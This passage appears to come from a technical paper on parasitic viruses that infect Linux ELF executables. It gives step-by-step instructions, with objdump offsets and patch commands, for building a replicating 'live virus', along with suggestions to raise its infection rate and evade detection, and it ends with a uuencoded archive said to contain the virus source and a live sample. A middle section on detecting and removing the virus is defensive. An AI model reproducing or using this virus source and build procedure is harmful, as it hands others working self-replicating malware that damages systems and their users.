928. above mentioned algorithm of using call to push the address (return value)
929. onto the stack.  To assist in the asm conversion, extra variables were
930. declared so to leave room on the stack to store the addresses as in some
931. cases the address was used more than once.
932.  
933. The C code form of the virus allowed for a debugging version which produces
934. verbose output, and allows argv[0] to be given as argv[1].  This is
935. advantageous because you can setup a pseudo infected host which is non
936. replicating.  Then run the virus making argv[0] the name of the pseudo infected
937. host.  It would replicate the parasite from that host.  Thus it was possible to
938. test without having a binary version of a replicating virus.
939.  
940. The C code was converted to asm using the c compiler gcc, with the -S flag to
941. produce assembler.  Modifications were made so that use of rodata for
942. initialized data (strings for open, unlink, and rename), was replaced with
943. the relocatable data using the call address methodology.
944.  
945. Most of the registers were saved on virus startup and restored on exit
946. (transference of control to host).
947.  
948. The asm version of the virus, can be improved tremendously in regards to
949. efficiency, which will in turn improve the expected life time and replication
950. of the virus (a smaller virus can infect more objects, where previously the
951. padding would dictate the larger virus couldn't infect it).  The asm virus was
952. written with development time the primary concern and hence almost zero time
953. was spent on hand optimization of the code gcc generated from the C version.
954. In actual fact, less than 5 minutes were spent in asm editing - this is
955. indicative that extensive asm specific skills are not required for a non
956. optmised virus.
957.  
958. The edited asm code was compiled (elf-p-virus-egg.c), and then using objdump
959. with the -D flag, the addresses of the parasite start, the required offsets for
960. patching were recorded.  The asm was then edited again using the new
961. information.  The executable produced was then patched manually for any bytes
962. needed. elf-text2egg was used to extract hex-codes for the complete length of
963. the parasite code usable in a C program, ala the ELF infector code.  The ELF
964. infector was then recompiled using the virus parasite.
965.  
966. # objdump -D elf-p-virus-egg
967. .
968. .
969. 08048143 <time>:
970.  8048143:       55              pushl  %ebp
971. .
972. .
973. 08048793 <main0>:
974.  8048793:       55              pushl  %ebp
975. .
976. .
977.  80487f8:       6a 00           pushl  $0x0
978.  80487fa:       68 7e 00 00 00  pushl  $0x7e
979.  80487ff:       56              pushl  %esi
980.  8048800:       e8 2e fa ff ff  call   8048233 <lseek>
981. .
982. .
983.  80489ef:       bd 00 00 00 00  movl   $0x0,%ebp
984.  80489f4:       ff e5           jmp    *%ebp
985.  
986. 080489f6 <dot_jump>:
987.  80489f6:       e8 50 fe ff ff  call   804884b <dot_call>
988.  80489fb:       2e 00 e8        addb   %ch,%al
989.  
990. 080489fd <tmp_jump>:
991.  80489fd:       e8 52 f9 ff ff  call   8048354 <tmp_call>
992.  8048a02:       2e 76 69        jbe    8048a6e <init+0x4e>
993.  8048a05:       33 32           xorl   (%edx),%esi
994.  8048a07:       34 2e           xorb   $0x2e,%al
995.  8048a09:       74 6d           je     8048a78 <init+0x58>
996.  8048a0b:       70 00           jo     8048a0d <tmp_jump+0x10>
997.  
998. 0x8048143 specifies the start of the parasite (time).
999. 0x8048793 is the entry point (main0).
1000. 0x80487fb is the lseek offset which is the offset in argv[0] to the parasite.
1001. 0x80489f0 is the host entry point.
1002. 0x8048a0d is the end of the parasite (not inclusive).
1003.  
1004. 0x8048a0d - 0x8048143 (2250)is the parasite length.
1005. 0x8048793 - 0x8048143 (1616) is the entry point as a parasite offset.
1006. 0x80487fb - 0x8048143 (1720) is the seek offset as a parasite offset.
1007. 0x80489f0 - 0x8048143 (2221) is the host entry point as a parasite offset.
1008.  
1009. # objdump --all-headers elf-p-virus-egg
1010. .
1011. .
1012. Program Header:
1013.     LOAD off    0x00000000 vaddr 0x08048000 paddr 0x08048000 align 2**12
1014.          filesz 0x00015960 memsz 0x00015960 flags r-x
1015. .
1016. .
1017.  
1018. The seek offset as a file offset is 0x80487fb - 0x08048000 + 0x00000000 (2043)
1019. (<seek address from above> - <vaddr> + <off>)
1020.  
1021. To patch the initial seek offset, an infection must be manually performed,
1022. and the offset recorded.  The infected host is not functional in this form.
1023.  
1024. # infect-elf-p host
1025. Parasite length: 2251, Host entry point index: 2221, Entry point offset: 1616
1026. Host entry point: 0x8048074
1027. Padding length: 3970
1028. New entry point: 0x80486ce
1029. Parasite file offset: 126
1030. Infection Done
1031. # vpatch elf-p-virus-egg 2043 126
1032.  
1033. The supplied program elf-egg2text will convert the address range specified
1034. on the command line, and found using the ELF loadable segments in the file to
1035. a hex string for use in C.
1036.  
1037. usage: elf-egg2text filename start stop
1038.  
1039. # elf-egg2text elf-p-virus-egg 0x08048143 0x8048a0d > parasite-v.c
1040.  
1041. parasite-v.c was edited manually to declare the hex string as the variabled
1042. char parasite[], and likewise these variables were declared.
1043.  
1044. long hentry = 2221;
1045. long entry = 1616;
1046. int plength = 2250;
1047.  
1048. The infector was recompiled and thus can infect the host it was compiled for
1049. making it a live virus.  null-carrier is the supplied host program that the
1050. infector is compiled for.
1051.  
1052. This completed the manual infection of the virus to a host.  The newly infected
1053. host would then attempt replication on execution.  A live virus has been
1054. included in the source package (live-virus-be-warned).  A simplified carrier
1055. program (carrier.S) was used to host the virus (null-carrier is the uninfected
1056. host as stated).
1057.  
1058. IMPROVING THE LINUX VIRUS
1059.  
1060. The first major change that would increase the life time and replication rates
1061. of the virus is to optimise the code to be space efficient.  Looking at a 50%
1062. size decrease is probably realistic when optimised.
1063.  
1064. The replication is notable rather slow scanning only the current directory.
1065. The virus may be modified to do small tree walks increasing infection rates
1066. dramatically.
1067.  
1068. The virus is easily detected - see below.
1069.  
1070. VIRUS DETECTION
1071.  
1072. The virus described is relatively easy to detect.  The blatant oddity is that
1073. the entry point of the program isn't in a normal section or not in a section at
1074. all.
1075.  
1076. Typically the last section in the text segment is .rodata which obviously
1077. shouldn't be the entry point.  Likewise, it is suspicious if a program does
1078. not have a corresponding section then this arouses any would be virus scanner.
1079. Also if no section table at all, which will disguise what section the entry
1080. point is in, is certainly an odd event (even though this is optional).
1081.  
1082. Removal of the virus described here, is similar to infection, requiring
1083. deletion of the virus code, modification of the ELF headers to reflect segment
1084. relocation in the file and patching of the entry point to jump to the proper
1085. code.
1086.  
1087. Location of the correct entry point can be easily seen by disassembling the
1088. executable using objdump, matching the entry point of the infected file to
1089. the disassembled code, and tracing through the code to find where the parasite
1090. code returns flow back to the host.
1091.  
1092. $ objdump --all-headers host        # a parasite infected host
1093.  
1094. >host:     file format elf32-i386
1095. >host
1096. >architecture: i386, flags 0x00000112:
1097. >EXEC_P, HAS_SYMS, D_PAGED
1098. >start address 0x08048522
1099.  
1100. .
1101. .
1102.  
1103. The entry point is thus seen as 0x08048522, the entry point of the suspected
1104. parasite code.
1105.  
1106. $ disassemble --disassemble-all host
1107.  
1108. >host:     file format elf32-i386
1109. >
1110. >Disassembly of section .interp:
1111. >
1112. >080480d4 <.interp>:
1113. > 80480d4:       2f              das
1114. > 80480d5:       6c              insb   (%dx),%es:(%edi)
1115.  
1116. .
1117. .
1118.  
1119. >Disassembly of section .text:
1120. >
1121. >08048400 <_start>:
1122. > 8048400:       31 ed           xorl   %ebp,%ebp
1123. > 8048402:       85 d2           testl  %edx,%edx
1124. > 8048404:       74 07           je     804840d <_start+0xd>
1125.  
1126. .
1127. .
1128.  
1129. >Disassembly of section .rodata:
1130. >
1131. >0804851c <.rodata>:
1132. > 804851c:       48              decl   %eax
1133. > 804851d:       6f              outsl  %ds:(%esi),(%dx)
1134. > 804851e:       73 74           jae    8048594 <_fini+0x94>
1135. > 8048520:       0a 00           orb    (%eax),%al
1136. > 8048522:       b8 00 84 04 08  movl   $0x8048400,%eax
1137. > 8048527:       ff e0           jmp    *%eax
1138. >        ...
1139. >Disassembly of section .data:
1140.  
1141. .
1142. .
1143.  
1144. Looking at the entry point code, which looks obviously to be parasite code
1145. since its residing in the .rodata section, we have.
1146.  
1147. movl    $0x8048400,%eax
1148. jmp *%eax
1149.  
1150. This code is easily seen to be jumping to _start, the original host code.
1151.  
1152. # entry host 0x808400
1153.  
1154. The parasite code is thus easily removed from program flow by patching the
1155. entry point to skip the parasite code.
1156.  
1157. On occasion no section matches the parasite code and hence the entry point.
1158. objdump will only disassemble sections so thus we cant see the parasite code as
1159. is.  However, gdb can be used to disassemble manually, and the same method of
1160. manually finding the host entry point can be used as above.
1161.  
1162. Automated virus detection of these variety of UNIX virus is practical by
1163. detecting missing section headers and/or entry points to non permissible
1164. sections or segments.
1165.  
1166. Typically, the default entry point is _start, however this can be changed in
1167. linking.  If a virus has been found in a file, and the host entry point is
1168. indeterminable for any reason, it may be beneficial to patch the entry point
1169. to _start.  This however is still guesswork and not totally reliable.
1170.  
1171. Typical general virus detection algorithms are directly applicable in UNIX,
1172. including signature strings, code flagging, file integrity checking etc.
1173.  
1174. EVADING VIRUS DETECTION IN ELF INFECTION
1175.  
1176. The major problem in terms of evading detection with the parasite described,
1177. is that the entry point changes to a suspicious position.
1178.  
1179. Ideally, the entry point of the program either wouldn't change or stay within
1180. expected sections.
1181.  
1182. A possible method using the parasite described would be to find unused memory
1183. in normal entry point sections such as the .text section, and insert code to
1184. jump to the parasite code.  This would require only a small number of bytes,
1185. and such empty space is common, as can be noted by looking through disassembly
1186. of executables.
1187.  
1188. Alternatively, one of the original ideas of where to insert the parasite code,
1189. thrown away,  by extending the text segment backwards may be possible.  The
1190. parasite code and entry point would belong in the .text section and thus
1191. seemingly be quite normal.
1192.  
1193. CONCLUSION
1194.  
1195. The algorithms and implementation presented gives a clear example and proof of
1196. concept that UNIX while not popular for, is actually a viable breeding ground
1197. for parasites and virus.
1198.  
1199. -- cut
1200. begin 644 unix-viruses-src.tgz
1201. M'XL(`"A__S<``^U]:XR<UW78ZF&%,U!+I?&/-`F"3RN+GB%G5_/>F5U1"46N
1202. M9")\:9>B+'.9Z3R^V1UR=F8R,[M<6F(L@V(;8LVZ*&K`+1JT0)$B19M?A6"W
1203. M@0(_TBHH7"=%$\"MT]8%G(*I#=0M@E:.%;/GG/N^W_WFL9Q=*?9\TG)F[N/<
1204. M<\\]Y]QSS[W?N5NMQL[<=J.[U?-[<[UN]9F9R3]>-KF0RWDS'CY)ZY/_\/(+
1205. M"POPETWG/2^5SF33,UYN'W`)/%N]?KGK>3/==KL_J-RP_+^DSY8]_F?+U_QZ
1206. MH^E/L(U4,IG/9D/'/YW,IL3XY_+I+(P_,`R,?W*".(0^/^;C?_*D=]Q;KU:C
1207. M)U\X<^+%5?@Q=S[MS=7;FXW^7+U;WO3G.NU&J^]WO;EU[REO[I5RLQD]>6;Y
1208. MQ+D73I]9A@J11JON5_MS?K,^U_'H7\90<S6_LK7N;7?*_>J&D>&OKWMKT4A$
1209. M3VNU67%,\UO][@WZUO=W^FDLKA6=[U'EUE:S.5<M=[L-OQN-`E:+H9CH.#A@
1210. M2R!ZZF)$_S5?C48^$CMY,N[!OT2IN&?F>W-M[R._R&!0&PP`?0VKS3-%58;E
1211. M8H1]NBJ)'%%#[_!BI%/NEGN-O@_Y>H8+4&A1O1N<>HOZ.+F`S9TZM?S\RR\:
1212. M8T2``LP@ZA(7,4X#\>LWJLA<`ZMS]A@`8-4$$(T^%:EV++ZQF!!+64E&9^>,
1213. MD:?66+OKLME`:4%`SE2+$?YE?E7":;5[_5JS4?%D%E8R^9F0UY.\9F/;YPU5
1214. M_+GKY6[+KT&Q^6<,K@\I5=W8;-=`YSJSH]6F7VXM1B/=39!\'%@IWO'H^ZV@
1215. MIL^^/H'YO^LWV]4RZ/OYZJ3:&#S_IQ?RJ07+_LOFT\GI_'\0SU.-5K6Y5?.]
1216. M9T$G-=KS&\]%C2104V8:,`PD6^5N])Y!?1A,[=_H^#T;:+?16C?3ZM56OVDF
1217. M@3HS$];]?KM#342?JH&)VO*]LR=>/'VRM'SNXLJKD>1."IXT/-$HU\U@MGA^
1218. MM]ON@E637-)3NULMEE;=@,%OM!K]*LPOEZ]`8C0RN[:36YB-1"+/'(UTMGH;
1219. M3<][VJ\U(I&CS[#,O)W9TS*3=F9Y1V5F[,R*EIFR,ZM:9CJ`D,K,%]9V,AGV
1220. MET[CWZQ6]"/)':1*!AY1H5);VTDF];]9SX,:F^WM)I9/)A"UCFR@7E_;\7.S
1221. MGO$\<]2+;':\H[+D$A*^NU7M>R68;+::OO=:-++<K&?2I>6-6C?BPS]+(F45
1222. M?AR-]%C25JO76(>9R&NV6^N1S7*-4F&@(I&FWQ)?`7B_7&G4=B`!Q^WH44B#
1223. MF:_1AB(WH74.^<:F=Q1U6+/4N[%9`D:IQ62KF`>I`"=!C-!*>,0"1QEP^-5N
1224. M]?H\K076;S0>?8W:]QK00J0.S!1K$.]X#>]9KP4?QX[%L:>11MV+/0EPJIN=
1225. MV!$&[S)KZW+CRGRO7T)X5Q(>?L3C4"'2]?M;W99W1):"GMV$5GCZN9?/G(&>
1226. M!3L&-HCJFT7SH^PSV!/JB-Y9Z`4K._<<)^-E^5N0^LK2@,Z+TCBP\WZIM]':
1227. MVM3HH08:6L1_CWM'9`/PF_K+Z8:_,;6$"L,[?MQ;_=C%TNJK9R^>>)X!LP:0
1228. M*D;@"P`-C#4\,:UXW.YEXTJ""LE&>XU/^L_@/^VZJACGA1ACT'=B"/B,+^&_
1229. MA#<T\.1Q&JFXQX>-T(O`0#K'<KO=J,&H^-5K?,1"!Q#I7J_1L"DI\H[Z%BF9
1230. M6$4)G:Y?KL7JM82'B0F/=XFJQ..(J)6"E.V0BHS-8MU9ZIF_T^C'4G'&C"#F
1231. MRV=>8!CW/!!SUA(@W4)&]XF&?JE1@\5,`HN"4DYXJ^P+;Z+>`97?KT.E&C26
1232. M\&9?:$!'6^T^EE]K.5JE-@1LX@E`?OEB:67Y3`A(1)(*$E@J.1SR9KFZ@1,)
1233. M`C];RA3RWI$CGCLS6\@/:%F451@P<"`QK.YP7+;];@^XDYJ[5#KY\LH*3&P#
1234. MFA3EL;7J5K<+]'<U(EBNV2[72EP"8DP-'.T()H.!LX25J3U`K]GS_6O$4U)<
1235. MVO5ZS^_C("__4FEU&9!\UDN:S$2U7#T^V@'>Y>W'-T&1M:LQ0PZQ(+:+!85@
1236. MZ9!9G3!B2@'`OIEPB?W-E.'L;U!O[_)J3'N,P$M"&1_E@]+AJK8GISRF=0U=
1237. M(=J"=C#/K0LB",*3PJY:CA\5S,9T-4#0%3*.C(ZF'!\`)X;%+#_>`%EZ6#&"
1238. M:HEA+%)-=`,H"##CLXEB:M4"</6>6%K80P;[Z61*T)`R_J,OKT4]Z[&9T,Z7
1239. M#8J$FV(ZQOD39V1HA+-1<%IGDJ"G,S:)X"1N<00D'CNF@!T[%HTP,O2N-]"%
1240. M9L[4+*M:[ODT8>,P+!H)YR\N6PG/G[ZXBDF1"G3V&LWC,G?UX@I,^)1KJ"N!
1241. M3<(3>DC-P`VDJ^H$SDNU';*N(@%K!DC06`IKFXP-`]D+*^=?%.C*1)A71D=0
1242. MM0,KEO)6LT]5A3KG]@7I=/H^>Z[M;91;M:;?]7!T!8?'B-:+WM,-T/"6[8)9
1243. MRB91G$F\'CEVC(^U4F5B@1^JQY@*6/&;WE$H&S(U!.QI37DXC2Z)<+/1NG9E
1244. MR8:`6HR;P3"Y8?LX(B!0S;GGNJ5&J]Z.JTHG8('@\56"CAVLY->=EJ9L'`%9
1245. M<&HP?Q[W/%&7BB%L[YC'6V?SG5D+#7'59984QQ$-[3<U;0.-TK@I(]W`/-0H
1246. MQV4%_F8K"F'\,;JM7BP]?_K<J9@H0J1#&5F]^'SIS/F3)X2B9#PXN[RR<GYE
1247. MT5O>Z?O=5KF)UFNEW01>ZR&OL<4*LA.S8X/JE$AUW!/-;9>;6S[TTB0_SP0=
1248. M`]C/<P(#WD\UZB`8'KF/HQ*E54+!BSW=6WRZN1/W&CUFXTN$$E[,6#+&$1P@
1249. M])3?JC7JG!S&@+J6%;)'[M)/'C>4@&F)14W)G45I04-,E$;#C[7#A!=E-RZ$
1250. M-]!6E(NO25FA<84\7'SUPK(A$(02*:85-#9!N9XC;2NUCI9WX<S%3'K13#I)
1251. M*1%BY;GC*`A+$3#WZ?>QXR1@WAPF1\CLUZIJ%7G!);U=3=DY".;9:FZ%:213
1252. MTS%2A?;=13);PPTVV`8O[(>L;6U3B%;X)IO)I0HU<G5)+6*%:NTH!4))CH4J
1253. M6^>*F3X2N<K<5NSKLYX#A>!:%F#'>16<SB-\0D>1YC,!_>*:BTTOF-?A7^U%
1254. M.Z7&&68PP6!)`G]3+'IOXL94WUOW^[@J1^X8R4G!-(]C=L&FM*6^X?T0@'AE
1255. M+LU46C<+`RLH8,&>5#,DF1H(Z!499(;>TQ;SEO890=<A3%-'*F<`H;972@F=
1256. M";K22^Z`NM2ZDC"&P*)47"&`_L]ABQNCQQY!U`7(=.%Y;/V1U!<8FWRBX-Z]
1257. MB4I<0%4#L?J-%A)9GY%5+8X+HGE,8$2^1E1G(4)E+6)8%VFMID;A+*,:I*[W
1258. M-X2]YFE5D+NB$5M!<86D1J36!BW7\[O]F#`.\$@&F_K$BGW0,O3ZAM_E7RN]
1259. M7@FJ,C\FKX.></I'VAZU<K_,%YU]@-U(T-ZC&$/1/893`P:8;:L#%&;&0$^A
1260. M,6^CW>M3CZG]N#!,ZM@4+8N.X#?'VHI*N!9KHF6$["$-:%$K*4N;#BALS'$`
1261. M,P_TP^%@,(L14JSD@RP=DWOS@!CK1,3"ZD805(AG+M*O05?;';\5F]V>[V]V
1262. M@"#G2Z^LG#]WYE7O=?AZ<F7YQ$7ZMOSQDV=4,\`ID@P`(]`>@@S#_'JW`1-&
1263. M7Z+.1CH(@\H-&%%(GZVV.S<D,\7`0#(8BEM+FO`D/$;\OD;\DR^OQ*-L-K(5
1264. M"N=\ID,`DD+]"#)WPDM1M:,QY/JC\2-R&RB5QHT@E^X$WF@PTDB)AP2/G2FA
1265. M<S*DA9D2'@!`BH;"2;0NO;8B(3XZ=2,'IE5M!P7""22*AW4R-%L\?=UOHESU
1266. M8?HX%!ZM=D:MY/+&B"=`[;""`?>,>&X:#IN@_,#LPU6UK@+`Z!Y;K)A6P1E"
1267. M*0,Q9SA5"F:$^SOKC1T^L92(N0<Z/:F$L@82:.P>X/Q.#3'#V!M@%$,FTP/,
1268. MO2RD/LAQEZ]>P8E!VUP6!O.P2HP22]RX%NOEB,D%UL);TQVT@JRWMUHU[LB7
1269. M(Z/9!>5^OUS=X!,<3HMB!U,<Z;(=T.'^9Y9T@9(ZNDN:J?:C/<TJ@%$5;O_-
1270. M]K;/7([D0-U&!9>0VE8:&8)5V`=QA)RO!*XX8:V<P@E+S$?U,>8CW2E_Q/*,
1271. M5YOMGA^C'UJ[C%[8YBLK>V@1%L<X%WO]#9_(JK;#Y(1^Q-AYX]MLH\[H`!^Z
1272. MT:C?H!:8C=5KPP^8%QM][UJK?;U'6=5VMPNL!]CH[$/8&!:3,3'Q:8G+'Q/:
1273. M)6J4#!ZP1[U-?[,-%5"BD"&\?KG2]/FN7XAIQ3<4.W)[`6!W='?]'@PMG<X(
1274. M^*/:QJ/INJ?&]NJY=YIBX?T9W3#K&)LI3,#B3)B">E%OP]*''7(2=:02O'"Q
1275. M=.K5<R?.GCXI/`MVH>-4Z,SY$Z=P)U-D,<G%.D#9!K)0@_$1C4W/7]\$;O!^
1276. M`8F,JDNPT`NHBB0\7FQ^?EYL,T8BNB,[,MLID2Y8C'`32":S]A<C9-3)5)R>
1277. M>I^T4X$%[43I](Z(#C&=8Z9Q]60FLC:L1&K"\&)PH_.X13&8GDU`K-=<U6G%
1278. M"2),VZ[2^NK:<*@D/*,[WC$'EB+1M@D%]O@1F*LE?$O4L;">I'6`8V!VB/>6
1279. M>?6D@X?<(QVQJZ"KCYK0'\"67?]7MAI=2.JWO7*UV@:44,$@T_5LS=(;K%IZ
1280. MNBCV)JA:>L-4R]XW!4W5TC-UBZ-#XTP16QV#E-`#H''7KS=Q1L!4ODQOMV#*
1281. MUF821FO7/F]OB&YRV6K6:0#ON>.>4C/Z!I40)6&3SS.OB\W1D*1,B,#FU<0'
1282. M".BH$7"C#"9-!2933EP<LS9;MR!Q:XW>-<4FS(2?\+A&ZC"7QP@@FY2C$6V<
1283. M.\YQ]G?Z(,?:../;"%*=Q_KM:`3%X#H??\D6\2BS%`YRED*C49C1MI*U.$-C
1284. M@\A-SX<1]"8_SQF(,'5M(^+6O!:"MKH>%X0QX3)8?%X4/BX327/BY378G&E7
1285. MH%1<E$:9=Y^L]E2X)K=TBYOG!NF6_3#/E+!-T#XC65.B)GI-)KW6WY9_G>LT
1286. MK8.ZYM&5GI$>9(.!;*3![83`[>P!+G:-^K11[EG:C:LV5"+-NK<!=/*[KD%\
1287. M`!^G&KG1UD1AK@T496(ZF]V4DYPMZZ@I8?J(Q2HG!EM#XR()'7"TC"]WUZMB
1288. M[0S?MR]?D6?>,`LU629D\VBK5U[W%V&9U":7MWJ;JNT^YJ>6[=10ZDK"HR_I
1289. M*^P4%Q9.$HH'?OX_\/X'BL4<>Z4(I'PB+X$,?O\CE4OETOS]CWPNF\7W/W*Y
1290. M5&;Z_L=!/(/?_]B']SI<[X_P=SWD>QT73KRX7%H]_8GE2#99S#.YQ<V"$@A:
1291. MOU%NQL0>&'ZV:]KN)":@N,NS[@WDY\L2()[],0KS?4KR<=&VY/4-W&6*H2$B
1292. M:X&RX@?W(J9AWV"3DBQ(KF?MUVLTVP:G([&1/)>2QJY2F6TG8*DO70K3`8^V
1293. M,F5]KHC0WK.1QYEDSI,'/+N#IE&]&5//:TAW!RMW&P;_G32\G,`1)7;D/&:?
1294. MI<6Q%?[4,4^BV^[Y$<ZE#W7U6R=`'6?6ES^^?'*DUNTC[%B13I"30?U@^(Q_
1295. MTGTD=$<\][Y7K$//Q(^$7.@)^1'046<C<"9$?HS9&_'L]W9"*!UM,T2L1![<
1296. M%=]Q^.*%`Y[_1-&KU_@/YH[G/[CQD\`36NI4N3"-.NT>V$EDL/*<#A4V#Z`S
1297. M/-1I`,<9`MW#KLCS`)[]_?:S1TP-0[#X4N#`_>]J4VG[LLX[M)VD%1W#4]]Q
1298. M^],ZQEL!`SSVG;\L+GLN'!UQO+XC9^G!#.!V?70>U/?QP$X)\SCL&(YXW0_O
1299. M=L,[O?!.)[S+!Z]<\`X/O,L![_*_!]SOZL3NN"[XL;S8Y/\8W6<?U7W>!^GN
1300. M-L4SW.O=VS>W-YL,E.*9M/_;?@UFW[W=;-Z3)_TTK]O[Z0>7LW'0S;TWOZ^A
1301. M2?;F]WU@Y;<WQZ\BQ8&[>K6F@TY<D1E0R?OLJ^7ZT!O-8[M/KDME+8[AEY04
1302. MT^WXL).?M@$>.`<ZRH(!>J_<F-AA3?#;$S@:V1[S:.0>O*;K;1@SBKZSU7$N
1303. MJ<=VG08AZN.A`!NFTY!1"3W_9C:FAD:NRM#/WA&.=AT112M8A:A9CSJ($S@M
1304. M1`(T#$-04G14!!F9#9<2S7\UX3A&NZ#=XPV;4(8<-/6TP=./F9KDWTYX8C(,
1305. MS(4#1W,`XDQ^YZ2$NG!W,X,Q/^\K,_1&80;>DV.$T+ZR@8Z%DZC6L<Q0GM`!
1306. M#3V&&8:_.I1IEQCF+ZE7-]K76S$=XZV&]F.]41O:.H$8^>5C<;PQRFFPB'Y5
1307. M?+53]-L^OSC2WHOE/P%>R&2$"V(;P_-$(Z'A>>CP4EAX'IGI"L\C,UWA>62F
1308. M*SR/S'2%YV&F!^3ZE;6=5'T6"WA7-SO>9F^]!)\4-`==#O"SBO$+/0FNR,`!
1309. MOW6:6B`@BMU36-M)9HW8/1'R6V#HGFS"[%$%6DZF0@JG$F8/*V4HX(<5SB9$
1310. MIZAPM;:V4TBR/N&P?20)/R.JS[FRH`AV05'$Z)_*U&E9L3/U42C8F?KX^7:F
1311. M/O+U`$*4&6!W=WPD10D9'HD5!Q`."#QBDASRHZJ"J,5''G+5P/LPN+4JJ\[^
1312. MJ&'D#LDFO$>GS[VP?/+B\BGO8^REFVA$S#)B]S(]>/>2APVD_3YA+PM5%1*M
1313. M1/E"Y3[FMC1.MN,)T_GY?F]M3I\1'O?^;Z]:;K4F%@)P2/S?;#J?M_=_4[EI
1314. M_-\#>282_R\\?-]T0V^ZH?>!V=`;Q00-[-8)"(X=.G$*@68]>FD6VX6EX+8O
1315. M-LOTMVO'FIV?[M%D3$XB0B]Y)3@C2V));X><E[7=-WT<U":<33+;PS'N"(^T
1316. M,Q?6Z%AQCT(V[U3XD'Z9O:2,L]C\_+S'UB)\KV!O>VJB_3V\!*,3R?;<A]%#
1317. M^?%'H4C(WIO>\,A;<&$8A:ZM1^:+D<]O3H))9-T!9YQ%F9$\WG:C^_+F#2J4
1318. M;1Z;P-C38KM2])(MO<1!O/S<<5[XR!$M]5DOYMP&HU=&I"/>>&]GK:7>M5E]
1319. M>?7"Z9.GS[^\ZM&KC]Z%\Z?/7?1$]NESWJD3%T\`W[QX%O+G9P,@Q"LUABID
1320. M/NS!KY)$-!$&U;6LOP.I@#%GPOMM-?WH/`'['V>=`SW_Z6%L8MO^SR[DIO;_
1321. M03QCV__N,Z$#5P7:N<Z5$ZNG+RZ7SBR?>_'BQR*17#:?EKD7SUXHX:4#YTZ<
1322. M70:5@@=HYLL=,$=J8!'-6EMQGJA5:_BQC\<CKWE<=WQ\EA2'G!5@-G@*-Q;M
1323. M&J*`#!HVQ#H4O_S6=D=S5Y*C>*OO/!<5C*UBA8L1]&"J3C]&Q4V^\%-4V(E9
1324. M=N*J%I^5N<[]-BJK0JSP<P:F9]L:FB7YOB\W<;00H*810\"U<P>FM6&!U0T.
1325. M.BEKY.(41>!$?=4QRXHP]DZH"B^`-2+FV]\P.H*J.H>)U\"M[<"+*R^?.QFR
1326. M'PB`+-I#DL*1[Z=L]<.QE$58+?T]%(XSYJEMYY=7ETLOG%_Y)3%H8*I<BTDJ
1327. M0Y(VOI`UJV?!"/%M0CZ%^M5MWR(!LAFN7[8[<7XRBCI2;O0[C5J,=E]PE!,(
1328. MR>P(*T(-<K^_#EE.W$G:TT;Q&QD++H]3A^&!/.[YG]^A,Z$VAKS_D<JG[/<_
1329. ML@NIZ?T?!_+@@:-J>[.#?K+KC?Z&-W=**9VNWVF6J^R`A:6K66',8,'.Q%$D
1330. M#JOFX=MH,*6M-IK;C;9WTN^5NSY,4+#6PF**[7#.;>)JO0D6!#NA=!`VB4KJ
1331. M-S9],Z760,_2D.M(PMZ"@614CH/MG@6\IB3$[IG?;J32V5EG=EKD9V8UX*_B
1332. MJK-TXM*+8%"9=Z/`2@OO4LSE9?*K;-\(,K(R[9Q,2^6U^A^'R?#T\FHDDDFJ
1333. MU-/G3IU>.7O^%*2RTVJGO=Y&>ZM9\RH8Z@7&N`H#7=]J>N4*3I@4R`B6U:<:
1334. M?@**5,M;>,:K_]%FT^M5N_YU;ZN##!&-D+G'AW]?[3SM&IC-\GH#H_@2K?A;
1335. MU]6.?)T/7_##L*=]]I;?<\^I!%93I&QNRW<!T;IKXK'Q<JO1OR&N34"V9U5B
1336. M+3RDI198C./IK#TE!=XRP*R-FGS;`$5&,SY'M#O[U/B2P[WI/FL?<.!LA#GV
1337. MGCQN)?#7>5)+KJLC=+A!/P[SNY"['VQ?\A&3JS_IO?[ZX-(IK71J:.FT5CH]
1338. MM'1&*YV118V.ZMWB=:WM`N&<-W-.O7I.A^,`$^KE#^21DW\@K!#?N]8/;0VQ
1339. M8:TA5"GAAF)&.CIS-H('93A/$-O%E=4?11?4DX'%AU$Z&HFKM\12NOU/.#%6
1340. M3IAU=#X4*1:$/A=V+NV!?-:=#?OTWI/'I86MSNVI=9J]HG`>,1RPI@@NYPPS
1341. MVEI;X`*(-$!@816VG-(ZN=?0F&$CX0I=:0UMH'+@;?X]UCZR1R;@YZ3JP\])
1342. M!7I-9[K,X;8.=FE5M/6G-9V)I?]ITO9@)SW=\^9IET="T^*8&^]&XNQT$GC'
1343. MZS8Z':BYX9>W&\T;>-[/0Y.E*N80%/)ZM[W)-@3*M9H,LID@LRT:P8M6ZXT=
1344. M,%[D]#.>ZT/-,"G.DI<M[A,W1R&M-Z23!(P'J"9>5F/!\N@U7(8Y"RMW0_V`
1345. M;%AFEOH>_.N>ZZ1;A;W"V]HN-_EWH`F(VI)ZDXW79N8=H-'HVD?W8@,\,+@(
1346. MCMO2RDN-[(#1*P0FV3'%6SD^F/>HURVW:C$T9V,DN?R-MC-X!KS6]GKM3;^_
1347. M@:S@PTQP0[<;/:S4\V+`-V7(*Z\#2\M3XS$"&_>>UFO$-?>"8.F+'UOV4#B\
1348. M2Z=77EX%M6[8_LXC18#>*9MS5<,U,1@P4K'9^=D`^2&=@.)(\C>;L6BM)C49
1349. M9CQI!`+7-GMBP7IQ49I'C36$]S7EN8/B=%T#16N4ER4@O+GG:B4NQM(BU=YS
1350. M`I.WT=*P=.+.HA,U>F!+M[S-1J_']H<80^,E)MXSPI!?XN]B\+QGE84>]V1Y
1351. MF;84HHUD2?Y:`ONM:R(5@YYMH[(@]&S#22X5^$Z4$.9GQ<H"C98;,E'#'`%0
1352. M3'K:8L/WV%%^D1R"YX008V%[HXX)NWHG):+&7)N]+'J[*8ZZM7T-K&VO7-N$
1353. MU1LC/_S?:[8[G1L>B\Q;@05-F1W]A2P8&[_<NP&"U=PBSL47;VB+"Y4=+8BO
1354. MM[UFN]WI1<5K*$$$"5H35+G/-\9"ANABEV(E8].,D#AQS,^[^$Z]5+<AU9E>
1355. M1+@^4:,MB8U%*/H<BK1$DZ]'S(H;0D6Q"PSE6!\[QFC+7'WXW#`RV(2XP88`
1356. M-_Z$\J,,-3R01;18Q%C&^^'13@5-(,NUG7I??=NIB3BWT_ONW7;B&>;>3@WW
1357. M;\/\;ONW,2G$OTVE:0(*\RJG`\YMW;/=0:-/]VQWT/`;Q;.='L>U'4!"J%/!
1358. M_;I]]_[X_P+^7XPA=[#Q?]*YA<#^;VYA>O[S0!Z<^"Z2J8$K"_B$I<'Z#5"?
1359. MZ*?#</S76W@`I]&<E\[<2?IH]R^6D'6/1M@M&G80CS&NR=C_ZRUP/18_X#LN
